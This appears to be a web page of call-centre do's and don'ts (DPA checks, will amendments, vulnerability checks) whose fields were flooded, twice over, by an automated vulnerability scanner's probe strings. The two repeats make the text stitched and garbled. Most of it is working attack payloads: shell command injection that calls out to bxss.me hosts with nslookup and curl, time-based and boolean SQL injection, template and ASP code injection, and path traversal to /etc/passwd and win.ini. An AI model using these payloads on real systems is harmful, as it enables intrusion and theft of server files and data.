
Do's
Don'ts
DPA check with existing customers: DOB, first line of address and postcode
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vulnerability
Read validation script
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1 %2527%2522
@@oRiGb
1
1
1
1
1
1
1
1
1
1
response.write(9872121*9359615)
'+response.write(9872121*9359615)+'
"+response.write(9872121*9359615)+"
echo tvvzhr$()\ usxpau\nz^xyu||a #' &echo tvvzhr$()\ usxpau\nz^xyu||a #|" &echo tvvzhr$()\ usxpau\nz^xyu||a #
&echo rzkikp$()\ yrmqhp\nz^xyu||a #' &echo rzkikp$()\ yrmqhp\nz^xyu||a #|" &echo rzkikp$()\ yrmqhp\nz^xyu||a #
1&echo rdkqtt$()\ idrrus\nz^xyu||a #' &echo rdkqtt$()\ idrrus\nz^xyu||a #|" &echo rdkqtt$()\ idrrus\nz^xyu||a #
|echo bxwemb$()\ daxbmn\nz^xyu||a #' |echo bxwemb$()\ daxbmn\nz^xyu||a #|" |echo bxwemb$()\ daxbmn\nz^xyu||a #
1|echo aqledl$()\ wjfzng\nz^xyu||a #' |echo aqledl$()\ wjfzng\nz^xyu||a #|" |echo aqledl$()\ wjfzng\nz^xyu||a #
expr 9000653776 - 957952
(nslookup -q=cname hitgbmrfnmeqe334a7.bxss.me||curl hitgbmrfnmeqe334a7.bxss.me))
$(nslookup -q=cname hitrtxonhswnfdaa97.bxss.me||curl hitrtxonhswnfdaa97.bxss.me)
&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&'\"`0&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&`'
&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&'\"`0&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&`'
|(nslookup -q=cname hitgdkurupshx2e5a1.bxss.me||curl hitgdkurupshx2e5a1.bxss.me)
`(nslookup -q=cname hitawcpmzombl28b2a.bxss.me||curl hitawcpmzombl28b2a.bxss.me)`
;(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)|(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)&(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjeyegwwawv8719b.bxss.me||curl${IFS}hitjeyegwwawv8719b.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&`'
u7bzZaGV
cxprHUJI: kSwppCGq
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
1
../1
12345'"\'\");|]* { <
Work through the customer journey
Listen to the customer
Phonetically check the names on Will amendments
Check for vulnerability
Read validation script
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)|(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)&(nslookup -q=cname hittjbtxfjvydc5fde.bxss.me||curl hittjbtxfjvydc5fde.bxss.me)
add_do.php/.
19914235
bfg1414<s1﹥s2ʺs3ʹhjl1414
bfgx1192z1z2abcxhjl1192
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg9432<s1﹥s2ʺs3ʹhjl9432
bfgx3072z1z2abcxhjl3072
<%={{={@{#{${dfb}}%>
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
-1 OR 2+130-130-1=0+0+0+1 --
-1 OR 2+80-80-1=0+0+0+1
-1' OR 2+173-173-1=0+0+0+1 --
-1' OR 2+628-628-1=0+0+0+1 or 'XUYOZOKE'='
-1" OR 2+124-124-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
YZjug0Hm'; waitfor delay '0:0:15' --
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))--
-5) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
phkAw6wj' OR 18=(SELECT 18 FROM PG_SLEEP(15))--
f16tDgWc') OR 19=(SELECT 19 FROM PG_SLEEP(15))--
7zwSJM7g')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
1'"
1 %2527%2522
@@oRiGb
1
1
1
1
1
1
1
1
1
1
response.write(9872121*9359615)
'+response.write(9872121*9359615)+'
"+response.write(9872121*9359615)+"
echo tvvzhr$()\ usxpau\nz^xyu||a #' &echo tvvzhr$()\ usxpau\nz^xyu||a #|" &echo tvvzhr$()\ usxpau\nz^xyu||a #
&echo rzkikp$()\ yrmqhp\nz^xyu||a #' &echo rzkikp$()\ yrmqhp\nz^xyu||a #|" &echo rzkikp$()\ yrmqhp\nz^xyu||a #
1&echo rdkqtt$()\ idrrus\nz^xyu||a #' &echo rdkqtt$()\ idrrus\nz^xyu||a #|" &echo rdkqtt$()\ idrrus\nz^xyu||a #
|echo bxwemb$()\ daxbmn\nz^xyu||a #' |echo bxwemb$()\ daxbmn\nz^xyu||a #|" |echo bxwemb$()\ daxbmn\nz^xyu||a #
1|echo aqledl$()\ wjfzng\nz^xyu||a #' |echo aqledl$()\ wjfzng\nz^xyu||a #|" |echo aqledl$()\ wjfzng\nz^xyu||a #
expr 9000653776 - 957952
(nslookup -q=cname hitgbmrfnmeqe334a7.bxss.me||curl hitgbmrfnmeqe334a7.bxss.me))
$(nslookup -q=cname hitrtxonhswnfdaa97.bxss.me||curl hitrtxonhswnfdaa97.bxss.me)
&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&'\"`0&nslookup -q=cname hitoujzqwxjpla3cf8.bxss.me&`'
&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&'\"`0&(nslookup -q=cname hitevtyefecihe1722.bxss.me||curl hitevtyefecihe1722.bxss.me)&`'
|(nslookup -q=cname hitgdkurupshx2e5a1.bxss.me||curl hitgdkurupshx2e5a1.bxss.me)
`(nslookup -q=cname hitawcpmzombl28b2a.bxss.me||curl hitawcpmzombl28b2a.bxss.me)`
;(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)|(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)&(nslookup -q=cname hityupruvnsdyd98b9.bxss.me||curl hityupruvnsdyd98b9.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjeyegwwawv8719b.bxss.me||curl${IFS}hitjeyegwwawv8719b.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfaffljzweve76dd.bxss.me||curl${IFS}hitfaffljzweve76dd.bxss.me)&`'
u7bzZaGV
cxprHUJI: kSwppCGq
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
1
../1
12345'"\'\");|]* { <